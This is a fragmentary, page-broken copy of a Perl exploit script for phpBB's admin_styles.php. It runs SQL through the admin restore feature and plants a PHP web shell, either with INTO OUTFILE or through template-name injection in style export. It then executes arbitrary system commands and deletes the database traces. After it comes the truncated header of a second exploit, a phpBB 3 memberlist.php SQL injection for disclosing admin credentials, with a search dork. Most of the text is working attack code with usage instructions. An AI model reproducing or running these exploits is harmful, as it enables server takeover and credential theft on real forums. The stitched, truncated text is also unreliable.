works regardless of php.ini settings.
Trang 1if($cmd eq 'clear')
{
&show_header;
print " -\n"; print "[~] Clearing database ";
$sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND
template_name="";';
$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }
if($suc == 1) { print " [ DONE ]\n"; }
print " -\n"; exit();
}
if($cmd eq 'create' && $method == 1)
{
&show_header;
print " -\n"; print "[!] Method 1 - use \"INTO OUTFILE\"\n";
print "[!] Create file for including.\n";
print "[~] Try to run sql query in database ";
$sql = 'SELECT \'<? passthru($_POST[jagajaga]); ?>\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';';
$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }
if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; }
if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; }
print " -\n"; exit();
}
if($cmd eq 'get_prefix')
{
&show_header;
print " -\n"; print "[~] Try to get prefix ";
$res = $xpl->get(
Trang 2"${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_ty pe=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$s id"
);
if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/)
{
$prefix = ($2)?($2):("No prefix");
print "[ DONE ]\nPREFIX : $prefix\n";
}
else { print "[ FAILED ]\n"; }
print " -\n"; exit(0);
}
if($cmd eq 'create' && $method == 2)
{
&show_header;
print " -\n"; print "[!] Method 2 - use \"create\\export style\"\n";
print "[~] Try to run sql query in database ";
$sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name`
`template_name` VARCHAR( 255 ) NOT NULL;';
$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }
if($suc == 1) { print " [ DONE ]\n"; }
print "[~] Creating new style ";
$res = $xpl->post(
"${path}admin_styles.php?sid=$sid",
[
'style_name' => '0wn',
'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir,
'mode' => 'create',
'submit' => 'Save Settings'
],
);
if($res->is_success){ print " [ DONE ]\n[~] Creating file "; }
else { print " [ FAILED ]\n"; exit(0); }
$res = $xpl->post(
Trang 3"${path}admin_styles.php?sid=$sid",
[
'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir,
'mode' => 'export',
'edit' => 'Submit'
],
);
if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; }
else { print " [ FAILED ]\n"; exit(0); }
print "[~] Delete style from database ";
$sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql);
print " [ DONE ]\n";
print " -\n"; exit(0);
}
$jagajaga = 'echo _GHC/RST_ ';
$jagajaga = $cmdspl;
$jagajaga = $cmd;
$jagajaga = $cmdspl;
$jagajaga = ' echo _GHC/RST_';
$res = $xpl->post(
"${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", [
'jagajaga' => "$jagajaga"
]
);
&show_header;
if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! Maybe you forgot create shell file first?\n"; exit(); }
@rez = split("_GHC/RST_",$res->content);
print " -\n"; print @rez[1];
Trang 4print " -\n";
sub usage(){
print " -\n"; print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; print " -\n"; print "Usage: $0 [options]\n";
print "\nOptions:\n\n";
print " -p path to phpBB admin interface e.g http://site.com/phpBB/admin/\n\n"; print " -s admin sid yeeesss you need admin rights for use this exploit =)\n\n"; print " -P database prefix (optional) default \"phpbb_\"\n\n";
print " -c [create|clear|get_prefix|(any unix/win command)]\n\n";
print " \"create\" for first create shell *default\n";
print " \"clear\" for delete our NULL styles from database\n";
print " \"get_prefix\" get table prefix\n";
print " \"any unix or win commands\" for commands execute =)\n\n";
print " -m method [1|2] (optional) default \"2\"\n\n";
print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n";
print " -\n"; print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n";
exit();
}
sub show_header()
{
print " -\n"; print " phpBB admin_styles.php command execution exploit by
RST/GHC\n";
print " -\n"; }
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content => [
perform => 'restore',
restore_start => 'Start Restore',
Trang 5backup_file => [
undef,
'0wneeeeedddd',
Content_type => 'text/plain',
Content => "$_[1]",
],
]
);
if ($res->is_success)
{
if ($res->content =~ /already exists/) { return 2; }
if ($res->content =~ /The Database has been successfully restored/) { return 1; } }
return 0;
}
black_hat_cr(HCE)
phpbb 3.x sql injection (with global moderator rights)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB
Group\"\n\n";
/*
Trang 6works regardless of php.ini settings